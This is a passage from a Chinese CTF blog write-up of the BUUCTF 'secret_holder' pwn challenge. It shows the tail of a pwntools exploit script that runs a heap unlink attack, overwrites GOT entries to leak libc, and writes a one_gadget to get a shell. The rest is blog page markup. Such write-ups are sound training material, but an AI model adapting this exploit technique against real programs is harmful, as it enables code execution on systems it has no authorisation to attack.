again&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  </span><br><span class="line">  small_ptr = 0x6020b0 # ida静态分析获取</span><br><span class="line">  big_ptr = 0x6020a0   # 同上</span><br><span class="line"></span><br><span class="line">  payload = p64(0)</span><br><span class="line">  payload += p64(0x21)             # fake size</span><br><span class="line">  payload += p64(small_ptr - 0x18) # 绕过FD-&gt;bk == P &amp;&amp; BK-&gt;fd == P</span><br><span class="line">  payload += p64(small_ptr - 0x10) # 同上</span><br><span class="line">  payload += p64(0x20)             # huge.pre_size, 绕过chunksize(P) != prev_size (next_chunk(P))</span><br><span class="line">  payload += p64(0x61a90)          # huge.size</span><br><span class="line">  renew(2, payload)                # 构造fake chunk</span><br><span class="line">  wipe(3)</span><br><span class="line">  log.info(&quot;wipe3 now &quot;)                          # 触发unlink</span><br><span class="line">  payload2 = b&#x27;a&#x27; * 8</span><br><span class="line">  payload2 += p64(elf.got[&#x27;free&#x27;]) # *big_ptr = free@got.plt</span><br><span class="line">  payload2 += b&#x27;a&#x27; * 8</span><br><span class="line">  payload2 += p64(big_ptr)         # *small_ptr = big_ptr</span><br><span class="line">  renew(1, payload2)</span><br><span class="line">  renew(2, p64(elf.plt[&#x27;puts&#x27;]))  # *free@got.plt = puts@plt</span><br><span class="line">  renew(1, p64(elf.got[&#x27;puts&#x27;]))  # *big_ptr = puts@got.plt</span><br><span class="line"></span><br><span class="line">  wipe(2)                         # puts(puts@got.plt)</span><br><span class="line">  puts_addr = u64(io.recvline()[:6].ljust(8, b&#x27;\0&#x27;))</span><br><span class="line">  libc_base = puts_addr - libc.symbols[&#x27;puts&#x27;]</span><br><span class="line">  print(hex(libc_base))</span><br><span class="line">  pause()</span><br><span class="line"></span><br><span class="line">  one_gadget = libc_base + 0x4368e</span><br><span class="line">  payload3 = b&#x27;a&#x27; * 0x10</span><br><span class="line">  payload3 += p64(elf.got[&#x27;puts&#x27;]) # *small_ptr = puts@got.plt</span><br><span class="line">  renew(1, payload3)</span><br><span class="line">  renew(1, p64(one_gadget))       # puts@got.plt = one_gadget</span><br><span class="line">  io.interactive()</span><br></pre></td></tr></table></figure></div>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> BUUCTF-secret_holder</li>
        <li><strong>Author:</strong> A1ex</li>
        <li><strong>Created at
                :</strong> 2025-12-17 19:19:05</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-12-17 20:02:15
            </li>
        
        <li>
            <strong>Link:</strong> https://havenoideal123.github.io/2025/12/17/BUUCTF-secret-holder/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/PWN/">#PWN</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/12/17/sleeply-holder/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">sleeply-holder</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2025/12/15/lctf2016-pwn200/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">lctf2016-pwn200</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="giscus-container"></div>
    <script data-swup-reload-script defer>
        async function loadGiscus() {
            const giscusConfig = {
                'src': 'https://giscus.app/client.js',
                'data-repo': 'havenoideal123/giscus_storage',
                'data-repo-id': 'R_kgDOQMJJcA',
                'data-category': 'Announcements',
                'data-category-id': 'DIC_kwDOQMJJcM4CxQZl',
                'data-mapping': 'pathname',
                'data-strict': '0',
                'data-reactions-enabled': '1',
                'data-emit-metadata': '1',
                'data-theme': 'preferred_color_scheme',
                'data-lang': 'zh-CN',
                'data-input-position': 'bottom',
                'data-loading': 'not-lazy',
                'crossorigin': 'anonymous',
                'async': true
            }
            const giscusScript = document.createElement('script');
            for (const key in giscusConfig) {
                giscusScript.setAttribute(key, giscusConfig[key]);
            }
            document.getElementById('giscus-container').appendChild(giscusScript);
        }
        if ('true') {
            let loadGiscusTimeout = setTimeout(() => {
                loadGiscus();
                clearTimeout(loadGiscusTimeout);
            }, 1000);
        } else {
            document.addEventListener('DOMContentLoaded', loadGiscus);
        }
    </script>


        
        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">BUUCTF-secret_holder</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#WP"><span class="nav-text">WP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#unlink"><span class="nav-text">unlink</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3"><span class="nav-text">题解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E4%BD%93%E6%80%9D%E8%B7%AF"><span class="nav-text">总体思路</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">A1ex</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        18 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.5</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="Search..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>